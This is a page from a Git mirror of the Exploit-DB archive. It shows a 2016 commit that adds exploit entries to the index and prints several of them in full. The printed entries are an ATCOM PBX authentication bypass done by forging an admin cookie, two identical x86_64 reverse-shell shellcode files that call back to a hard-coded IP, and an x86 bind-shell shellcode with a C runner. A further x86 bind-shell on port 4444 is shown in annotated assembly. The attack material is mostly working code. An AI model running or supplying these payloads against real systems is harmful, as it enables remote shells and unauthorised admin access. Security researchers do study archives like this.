bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-06-17

Browse source 
12 new exploits

Linux x86_64 - Reverse Shell Shellcode

Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal

Solarwinds Virtualization Manager - Privilege Escalation

Blat 3.2.14 - Stack Overflow

Linux/x86 - Bindshell with Configurable Port - 87 bytes

Linux x86_64 Shellcode Null-Free Reverse TCP Shell

Linux x86 TCP Bind Shell Port 4444 (656 bytes)

Tiki-Wiki CMS Calendar 14.2_ 12.5 LTS_ 9.11 LTS_ and 6.15 - Remote Code Execution

Linux/Windows/BSD x86_64 execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode
ATCOM PBX IP01_ IP08 _ IP4G_ IP2G4A - Authentication Bypass
Roxy Fileman 1.4.4 - Arbitrary File Upload
SlimCMS 0.1 - CSRF (Change Admin Password)
This commit is contained in:
Offensive Security 2016-06-17 05:05:00 +00:00
parent 33dd246d8a
commit 2815f48e25
13 changed files with 1393 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
files.csv
View file

@ -35792,6 +35792,7 @@ id,file,description,date,author,platform,type,port
39575,platforms/php/webapps/39575.txt,"WordPress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
39576,platforms/php/webapps/39576.txt,"WordPress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
39577,platforms/php/webapps/39577.txt,"WordPress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80
39578,platforms/lin_x86-64/shellcode/39578.c,"Linux x86_64 - Reverse Shell Shellcode",2016-03-21,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit",2016-03-21,"Rakan Alotaibi",windows,local,0
39580,platforms/php/webapps/39580.txt,"Disc ORGanizer - DORG - Multiple Vulnerabilities",2016-03-21,SECUPENT,php,webapps,80
39581,platforms/hardware/webapps/39581.txt,"D-Link DWR-932 Firmware 4.00 - Authentication Bypass",2016-03-21,"Saeed reza Zamanian",hardware,webapps,80
@ -35882,6 +35883,7 @@ id,file,description,date,author,platform,type,port
39678,platforms/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross Site Request Forgery",2016-04-11,hyp3rlinx,php,webapps,80
39679,platforms/php/webapps/39679.txt,"OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution",2016-04-11,"Naser Farhadi",php,webapps,80
39680,platforms/windows/local/39680.txt,"CAM UnZip 5.1 - Archive Path Traversal",2016-04-11,hyp3rlinx,windows,local,0
39968,platforms/windows/webapps/39968.txt,"Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal",2016-06-16,LiquidWorm,windows,webapps,1947
39682,platforms/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",php,webapps,80
39683,platforms/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,hardware,webapps,80
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86_64 - bindshell (PORT: 5600) - 81 bytes",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
@ -35901,6 +35903,7 @@ id,file,description,date,author,platform,type,port
39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86_64 - Read /etc/passwd - 65 bytes",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
39701,platforms/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,cgi,webapps,443
39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation",2016-04-15,metasploit,linux,local,0
39967,platforms/linux/local/39967.txt,"Solarwinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0
39704,platforms/php/webapps/39704.txt,"WordPress leenk.me Plugin 2.5.0 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0
@ -35984,6 +35987,7 @@ id,file,description,date,author,platform,type,port
39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC",2016-05-09,"Nipun Jaswal",windows,dos,0
39791,platforms/multiple/local/39791.rb,"ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,metasploit,multiple,local,0
39792,platforms/ruby/remote/39792.rb,"Ruby on Rails Development Web Console (v2) Code Execution",2016-05-09,metasploit,ruby,remote,3000
39966,platforms/windows/dos/39966.txt,"Blat 3.2.14 - Stack Overflow",2016-06-16,Vishnu,windows,dos,0
39794,platforms/windows/shellcode/39794.c,"All Windows Null-Free Shellcode - Functional Keylogger to File - 601 (0x0259) bytes",2016-05-10,Fugu,windows,shellcode,0
39795,platforms/windows/dos/39795.pl,"MediaInfo 0.7.61 - Crash PoC",2016-05-10,"Mohammad Reza Espargham",windows,dos,0
39796,platforms/windows/dos/39796.py,"Ipswitch WS_FTP LE 12.3 - Search field SEH Overwrite POC",2016-05-10,"Zahid Adeel",windows,dos,0
@ -36004,6 +36008,7 @@ id,file,description,date,author,platform,type,port
39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0
39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80
39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port - 87 bytes",2016-05-16,JollyFrogs,lin_x86,shellcode,0
39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - Archive Path Traversal",2016-05-16,hyp3rlinx,php,webapps,0
39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0
39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC",2016-05-16,HauntIT,windows,dos,0
@ -36030,12 +36035,14 @@ id,file,description,date,author,platform,type,port
39841,platforms/xml/webapps/39841.txt,"SAP NetWeaver AS JAVA 7.1 - 7.5 - Information Disclosure",2016-05-19,ERPScan,xml,webapps,0
39842,platforms/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos,0
39843,platforms/windows/local/39843.c,"VirIT Explorer Lite & Pro 8.1.68 - Local Privilege Escalation",2016-05-19,"Paolo Stagno",windows,local,0
39844,platforms/lin_x86-64/shellcode/39844.c,"Linux x86_64 Shellcode Null-Free Reverse TCP Shell",2016-05-20,"Sudhanshu Chauhan",lin_x86-64,shellcode,0
39845,platforms/windows/local/39845.txt,"Operation Technology ETAP 14.1.0 - Local Privilege Escalation",2016-05-23,LiquidWorm,windows,local,0
39846,platforms/windows/dos/39846.txt,"Operation Technology ETAP 14.1.0 - Multiple Stack Buffer Overrun Vulnerabilities",2016-05-23,LiquidWorm,windows,dos,0
39847,platforms/lin_x86-64/shellcode/39847.c,"Linux x86_64 Information Stealer Shellcode",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80
39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80
39851,platforms/lin_x86/shellcode/39851.c,"Linux x86 TCP Bind Shell Port 4444 (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
39852,platforms/java/remote/39852.rb,"Oracle ATS Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088
39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,metasploit,unix,remote,443
39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0
@ -36060,11 +36067,13 @@ id,file,description,date,author,platform,type,port
39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
39965,platforms/php/webapps/39965.txt,"Tiki-Wiki CMS Calendar 14.2_ 12.5 LTS_ 9.11 LTS_ and 6.15 - Remote Code Execution",2016-06-16,"Dany Ouellet",php,webapps,80
39879,platforms/php/webapps/39879.txt,"Joomla SecurityCheck Extension 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80
39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Stored XSS",2016-06-02,"Fernando Câmara",jsp,webapps,0
39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706_ 1.5.1_ 1.5.3 - Unauthenticated File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0
39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - CSRF Add Admin Exploit",2016-06-06,"Ali Ghanbari",php,webapps,80
39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode",2016-06-06,odzhancode,multiple,shellcode,0
39886,platforms/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps,0
39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit",2016-06-06,lastc0de,cgi,webapps,80
39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,gsX,windows,local,0
@ -36139,3 +36148,6 @@ id,file,description,date,author,platform,type,port
39959,platforms/windows/dos/39959.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos,0
39960,platforms/windows/dos/39960.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos,0
39961,platforms/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos,0
39962,platforms/hardware/webapps/39962.txt,"ATCOM PBX IP01_ IP08 _ IP4G_ IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,hardware,webapps,80
39963,platforms/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",php,webapps,80
39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - CSRF (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80

Can't render this file because it is too large.

45
platforms/hardware/webapps/39962.txt Executable file
View file

@ -0,0 +1,45 @@
# Title: ATCOM PBX system , auth bypass exploit
# Author: i-Hmx
# contact : n0p1337@gmail.com
# Home : sec4ever.com
# Tested on : ATCOM IP01 , IP08 , IP4G and ip2G4A
Details
The mentioned system is affected by auth bypass flaw that allow an attacker to get admin access on the vulnerable machine without perior access
The security check is really stupid , depend on js
affected lines
js/util.js
function alertWithoutLogin(){
var username = getCookie("username");
//alert(username);
if(!!!username){
alert('Sorry, permission denied. Please login first!');
}
}
so actually it just check if username value exist in cookies
and if not , redirect to login.html
just like that!!!!!!!!!!!!!
exploitation?!
just from browser , press f12 , open console
type document.cookie="username=admin"
or from burp intercept proxy and set the cookies as well
go to ip/admin/index.html
and you are in , simple like that :/
Demo request
GET /admin/index.html HTTP/1.1
Host: 192.168.44.12
User-Agent: Mozilla/1.0 (Windows NT 3.3; WOW32; rv:60.0) Gecko/20010101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: username=admin
Connection: close
Upgrade-Insecure-Requests: 1
From Eg-R1z with love
./Faris

84
platforms/lin_x86-64/shellcode/39578.c Executable file
View file

@ -0,0 +1,84 @@
/*
# Exploit Title: Shellcode [Linux x86_64 Reverse Shell]
# Date: 19/03/2016
# Shellcode Author: Sudhanshu Chauhan
# LinkedIn: https://in.linkedin.com/in/sudhanshuchauhan
# Tested on: [Ubuntu 14.04.1 x86_64]
global _start
_start:
;Socket
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx
add rax, 41
add rdi, 2
add rsi, 1
syscall
; copy socket descriptor
mov rdi, rax
; Socket details IP- 192.168.1.2 Port- 1234
xor rax, rax
push rax
mov dword [rsp-4], 0x0201a8c0
mov word [rsp-6], 0xd204
sub rsp, 6
push word 0x2
;connect
xor rax, rax
xor rdx, rdx
add rax, 42
mov rsi, rsp
add rdx, 16
syscall
;duplicate sockets
xor rax, rax
add rax, 33
xor rsi, rsi
syscall
mov al, 33
add rsi, 1
syscall
mov al, 33
add rsi, 1
syscall
; execve
xor rax, rax
push rax
mov rbx, 0x68732f2f6e69622f
push rbx
mov rdi, rsp
push rax
mov rdx, rsp
push rdi
mov rsi, rsp
add rax, 59
syscall
*/
#include <stdio.h>
#include<string.h>
unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x29\x48\x83\xc7\x02\x48\x83\xc6\x01\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\xc7\x44\x24\xfc\xc0\xa8\x01\x02\x66\xc7\x44\x24\xfa\x04\xd2\x48\x83\xec\x06\x66\x6a\x02\x48\x31\xc0\x48\x31\xd2\x48\x83\xc0\x2a\x48\x89\xe6\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
}

83
platforms/lin_x86-64/shellcode/39844.c Executable file
View file

@ -0,0 +1,83 @@
/*
# Exploit Title: Shellcode [Linux x86_64 Reverse Shell]
# Date: 19/03/2016
# Shellcode Author: Sudhanshu Chauhan
# LinkedIn: https://in.linkedin.com/in/sudhanshuchauhan
# Tested on: [Ubuntu 14.04.1 x86_64]
global _start
_start:
;Socket
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx
add rax, 41
add rdi, 2
add rsi, 1
syscall
; copy socket descriptor
mov rdi, rax
; Socket details IP- 192.168.1.2 Port- 1234
xor rax, rax
push rax
mov dword [rsp-4], 0x0201a8c0
mov word [rsp-6], 0xd204
sub rsp, 6
push word 0x2
;connect
xor rax, rax
xor rdx, rdx
add rax, 42
mov rsi, rsp
add rdx, 16
syscall
;duplicate sockets
xor rax, rax
add rax, 33
xor rsi, rsi
syscall
mov al, 33
add rsi, 1
syscall
mov al, 33
add rsi, 1
syscall
; execve
xor rax, rax
push rax
mov rbx, 0x68732f2f6e69622f
push rbx
mov rdi, rsp
push rax
mov rdx, rsp
push rdi
mov rsi, rsp
add rax, 59
syscall
*/
#include <stdio.h>
#include<string.h>
unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x29\x48\x83\xc7\x02\x48\x83\xc6\x01\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\xc7\x44\x24\xfc\xc0\xa8\x01\x02\x66\xc7\x44\x24\xfa\x04\xd2\x48\x83\xec\x06\x66\x6a\x02\x48\x31\xc0\x48\x31\xd2\x48\x83\xc0\x2a\x48\x89\xe6\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
}

192
platforms/lin_x86/shellcode/39815.c Executable file
View file

@ -0,0 +1,192 @@
/*===================================================================*/
/*
Filename: bindshell.c
Author: JollyFrogs (LookoutFrog@gmail.com)
License: This work is licensed under a Creative Commons
Attribution-NonCommercial 4.0 International License.
Compile:
gcc -m32 -fno-stack-protector -z execstack bindshell.c -o bindshell
*/
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
unsigned char shellcode[] = \
"\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97"
"\x5b\x58\x66\xb8\x15\xb3\x66\x50\x66\x53\x89\xe1\x31\xc0\xb0\x10"
"\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x50\x57\xb0\x66\x43\x43\x89"
"\xe1\xcd\x80\xb0\x66\x43\xcd\x80\x93\x87\xcf\x49\xb0\x3f\xcd\x80"
"\x75\xf9\x50\x59\x50\x5a\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x87\xe3\xcd\x80";
static bool shellcode_zerocheck() {
// initialize counter
int i = 0;
// check each byte in shellcode array for hexidecimal zero value, return false if zero found
for(i = 0; i < sizeof(shellcode)-1; i++) {if (shellcode[i] == '\x00') return false;}
// Return true if no zeroes found
return true;
}
static bool shellcode_setport(char *buf, int port) {
// Check if decimal port is valid
if (port<1024 || port>65535) return false;
// The offset of the port is 21, but reduce by 1 since the array counts from 0
int shellcode_port_offset = 20; // (\x15\xb3)
// convert decimal port to hexidecimal
*(short *)(buf+shellcode_port_offset) = port; // (\x15\xb3) - shellcode array counts from 0
// Swap port bytes to accomodate for Little Endian memory structure
char tmp = buf[shellcode_port_offset];
buf[shellcode_port_offset] = buf[shellcode_port_offset+1];
buf[shellcode_port_offset+1] = tmp;
// Check if the hexidecimal port contains zeroes, if it does then show an error
if (shellcode[20] == '\x00' || shellcode[21] == '\x00') {
printf("port HEX contains zeroes\n"); return false;
}
// Return true if all checks passed
return true;
}
main () {
// Port in decimal - should be higher than 1024 and lower than 65536
int port = 1234;
// Basic error checking
if (!shellcode_setport(shellcode, port)) {printf("ERROR: Invalid port\n");return 0;}
if (!shellcode_zerocheck()) {printf("ERROR: Shellcode contains zeroes\n");return 0;}
// Print shellcode length.
printf("Shellcode Length: %d\n", strlen(shellcode));
// Run assembly commands
__asm__ (
// Initialize registers
"movl $0x12345678, %eax\n\t"
"movl $0x12345678, %ebx\n\t"
"movl $0x12345678, %ecx\n\t"
"movl $0x12345678, %edx\n\t"
"movl $0x12345678, %edi\n\t"
"movl $0x12345678, %esi\n\t"
"movl $0x12345678, %ebp\n\t"
// execute shellcode
"jmp shellcode");
}
/* Assembly source of shellcode:
global _start
section .text
_start:
; parameters for SOCKET(2) are placed on the stack in reverse order
; SOCKET(2) Synopsis: int socket(int domain, int type, int protocol);
; Before instruction "int 0x80" the stack should look like:
; 02 00 00 00 01 00 00 00 00 00 00 00
; ^AF_INET ^S_STREAM ^TCP
xor eax, eax ; EAX = 00000000
push eax ; PUSH 00000000 (TCP)
inc eax ; EAX = 00000001
push eax ; PUSH 00000001 (SOCK_STREAM)
pop ebx ; EBX = 00000001 (SOCKETCALL.SOCKET)
push eax ; PUSH 00000001 (SOCK_STREAM)
inc eax ; EAX = 00000002
push eax ; PUSH 00000002 (AF_INET)
; invoke socketcall to create the socket
mov al, 0x66 ; EAX = 00000066 (SOCKETCALL)
mov ecx, esp ; ECX = points to top of stack (0xBFFFF3E4)
int 0x80 ; SYSCALL SOCKETCALL(2)-SOCKET(2)
xchg edi, eax ; store fd in edi
; parameters for BIND(2) are placed on the stack in reverse order
; BIND(2) Synopsis: int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
; Before instruction "int 0x80" the stack should look like:
; 07 00 00 00 xx xx xx xx 10 00 00 00 02 00 b3 15 00 00 00 00
; ^FD ^ ^structlen ^AFNT ^port ^in_addr
; | PTR to ---------------^
pop ebx ; EBX = 00000002 (SOCKETCALL.BIND)
pop eax ; EAX = 00000001
; Note: Stack = 00000000
mov ax, 0xB315 ; EAX = 0000B315 (5555 reversed)
push ax ; PUSH B315 (sockaddr_2)
push bx ; PUSH 0002 (sockaddr_3)
mov ecx, esp ; ECX = ESP (0xBFFFF3E8)
xor eax, eax ; EAX = 00000000
mov al, 0x10 ; EAX = 00000010
push eax ; PUSH 00000010 (len(sockaddr))
push ecx ; PUSH (*ADDR) (ptr to sockaddr)
push edi ; push (FD) (SOCKFD)
; invoke socketcall to bind the socket to IP and port
mov al, 0x66 ; EAX = 00000066 (SOCKETCALL)
mov ecx, esp ; ECX = points to top of stack (0xBFFFF3DC)
int 0x80 ; SYSCALL SOCKETCALL(2)-BIND(2)
; parameters for LISTEN(2) are placed on the stack in reverse order
; LISTEN(2) Synopsis: listen(int sockfd, int backlog)
; Before instruction "int 0x80" the stack should look like:
; 07 00 00 00 00 00 00 00
; ^FD ^Backlog = 0
; Note that EAX = 00000000 due to return code from SOCKETCALL above
push eax ; PUSH 00000000 (Backlog)
push edi ; PUSH (FD) (SOCKFD)
; invoke socketcall to set the socket in listen mode
mov al, 0x66 ; EAX = 00000066 (SOCKETCALL)
inc ebx ; EBX = 00000003
inc ebx ; EBX = 00000004 (SOCKETCALL.LISTEN)
mov ecx, esp ; ECX = points to top of stack (0xBFFFF3D4)
int 0x80 ; SYSCALL SOCKETCALL(2)-LISTEN(2)
; Note: The selected port is opened on the system and listening
; parameters for ACCEPT(2) are placed on the stack in reverse order
; ACCEPT(2) Synopsis: int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
; Before instruction "int 0x80" the stack should look like:
; 07 00 00 00 00 00 00 00 00 00 00 00
; Note that EAX is set to 0 upon successful execution of SOCKETCALL.LISTEN
; Note that stack at 0xBFFFF3D4 already contains what I need:
; 07 00 00 00 00 00 00 00 00 00 00 00
; invoke socketcall to set the socket to accept connections
mov al, 0x66 ; EAX = 00000066 (SOCKETCALL)
inc ebx ; EBX = 00000005 (SOCKETCALL.ACCEPT)
int 0x80 ; SYSCALL SOCKETCALL(2)-ACCEPT(2)
; use syscal DUP2(2) to copy the stdin(0), stdout(1) and stderr(2)
; DUP2(2) Synopsis: int dup2(int oldfd, int newfd);
xchg eax, ebx ; EBX = CFD, EAX = 00000005
xchg ecx, edi ; ECX = 00000007
; XCHG ECX, EDI saves us having to zero out ecx and then MOV 3
redirect:
dec ecx ; ECX = 00000002 (eventually)
mov al, 0x3f ; DUP2(2) (3 times - ECX=2, ECX=1, ECX=0)
int 0x80 ; SYSCALL DUP2(2) (ECX=2, ECX=1, ECX=0)
jnz redirect ;
; spawn /bin/sh shell
; Note that EAX is set to 00000000 upon last succesful execution of DUP2
push eax ; PUSH 00000000 (NULL byte)
pop ecx ; ECX = 00000000 (EXECVE ARGV)
push eax ; PUSH 00000000 (NULL byte)
pop edx ; EDX = 00000000 (EXECVE ENVP)
; push '/bin//sh, 0' on stack
push eax ; PUSH 00000000 (NULL byte)
mov al, 0xb ; EXECVE(2)
push 0x68732f2f ; "//sh"
push 0x6e69622f ; "/bin"
xchg esp, ebx ; Save a byte by sacrificing unneeded ESP
int 0x80 ; Start /bin/sh in the client socket FD
*/
/*===================================================================*/

278
platforms/lin_x86/shellcode/39851.c Executable file
View file

@ -0,0 +1,278 @@
// Title: Linux X86 Bind TCP:4444 (656 bytes)
// Author: Brandon Dennis
// Contact: bdennis@mail.hodges.edu
// Date: 5/24/2016
// ASM Source: https://github.com/slyth11907/x86-ASM-Linux-Intel/blob/master/Code-Examples/ShellCode/execve-stack-bind.asm
/*
; Filename: execve-stack-bind.asm
; Author: Brandon Dennis
; Date: 5/24/2016
; execve
; execve takes 3 arguments
; 1: filename: EX /bin/bash, 0x0
; 2: arguments for the executable(1st arg should be the filename then 2nd arg should be null or 0x0000)
; 3: envp is used for env settings, we can leave this as null: EX 0x0000
; Python code to get the instruction in HEX of the string reversed to place into the stack
; python -c 'string="//etc/shadow";splitNum=8;print "\nLength: %s" % len(string[::-1]);string=string[::-1].encode("hex"); \
; string=["push 0x"+str(string[i:i+splitNum]) for i in range(0, len(string), splitNum)]; \
; print "Hex List:\n"; print("\n".join(h for h in string))'
; Port: 4444 (\x5c\x11) in shellcode
; ShellCode---
; "\x31\xc0\x50\x66\xb8\x66\x00\x31\xdb\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80
; \x89\xc2\x31\xc0\x66\xb8\x66\x00\x31\xdb\xb3\x14\x6a\x04\x54\x6a\x02\x6a\x01
; \x52\x89\xe1\xcd\x80\x31\xc0\x66\xb8\x66\x00\x31\xdb\x53\xb3\x02\x66\x68\x11
; \x5c\x66\x6a\x02\x89\xe1\x6a\x16\x51\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53
; \x66\xb8\x66\x00\xb3\x04\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53\x53\x66\xb8
; \x66\x00\xb3\x05\x52\x89\xe1\xcd\x80\x89\xc2\x31\xc0\x31\xc9\xb0\x3f\x89\xd3
; \xcd\x80\x31\xc0\x31\xc9\xb0\x3f\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\xb1\x02\xcd
; \x80\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f
; \x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
; ShellCode---
; Bytes: 656
; Tested on: Linux 3.13.0-32, Ubuntu 12.04.5 LTS, X86
global _start
section .text
_start:
; Create the socket FD
; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
xor eax, eax
push eax ; this is for our first arg as it is needing be be 0 for IPPROTO_IP
mov ax, 102 ; moves syscall for socketcall into ax
xor ebx, ebx ; 0's out ebx
mov bl, 0x1 ; setting the socketcall type to sys_socket
push 0x1 ; we now pass 1 onto the stack for SOCK_STREAM
push 0x2 ; we now pass 2 onto the stack for AF_INET
mov ecx, esp; this moves the memory location of our args to ecx
int 0x80 ; execute the syscall socketcall
mov edx, eax ; This allows us to save the FD from the socket
; This avoids SIGSEGV when trying to reconnect
; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &socklen_t, socklen_t)
xor eax, eax; 0's our eax
mov ax, 102; moves syscall for socketcall into ax
xor ebx, ebx; 0's out ebx
mov bl, 0x14; moves the sys_setsocketopt as param 1
push 0x4; push the sizeof onto the stack
push esp; now we push the memory location of param 1(sizeof) onto the stack
push 0x2; we now set the SO_REUSEADDR onto the stack
push 0x1; we now set the SOL_SOCKET onto the stack
push edx; this pushes our previous socket FD onto the stack
mov ecx, esp; this pushes the memory location of our args into ecx
int 0x80; execute the syscall socketcall
; We now setup the bind
; bind(sockfd, [AF_INET, 11111, INADDR_ANY], 16)
xor eax, eax; 0's out eax
mov ax, 102; moves syscall for socketcall into ax
xor ebx, ebx; 0's out ebx
push ebx; this pushes 0 onto the stack for our first arg of INADDR_ANY for our local host
mov bl, 0x2; set the socketcall type to sys_bind
push WORD 0x5c11; we now set the port to bind on, in reverse order is 4444
push WORD 0x2; we now push the arg AF_INET onto the stack
mov ecx, esp; we now grab our memeory location to our args
push 0x16; we now set the sockaddr size onto the stack
push ecx; we now push our memory location of our previous args onto the stack
push edx; we push our current socket FD onto the stack
mov ecx, esp; we now get our new socket FD
int 0x80; execute the syscall socketcall
; We now need to setup a passive socket to wait for the new connection
; listen(sockfd, 0);
xor eax, eax; 0's our eax
xor ebx, ebx; 0's out ebx
push ebx; this pushes our 2nd arg for connection que size to 0
mov ax, 102; moves syscall for socketcall into ax
mov bl, 0x4; we now set the socketcall type to sys_listen
push edx; we now push our socket FD onto the stack
mov ecx, esp; we now move the memory location of our args list into ecx
int 0x80; execute the syscall for socketcall with the listen type
; We now accept the connection when it comes in
; accept(sockfd, NULL, NULL)
xor eax, eax; 0's our eax
xor ebx, ebx; 0's out ebx
push ebx; we add these 2 0's since we dont need information on the client connecting to us
push ebx
mov ax, 102; moves syscall for socketcall int ax
mov bl, 0x5; we set the socketcall type to sys_accept
push edx; we push our Socket FD onto the stack
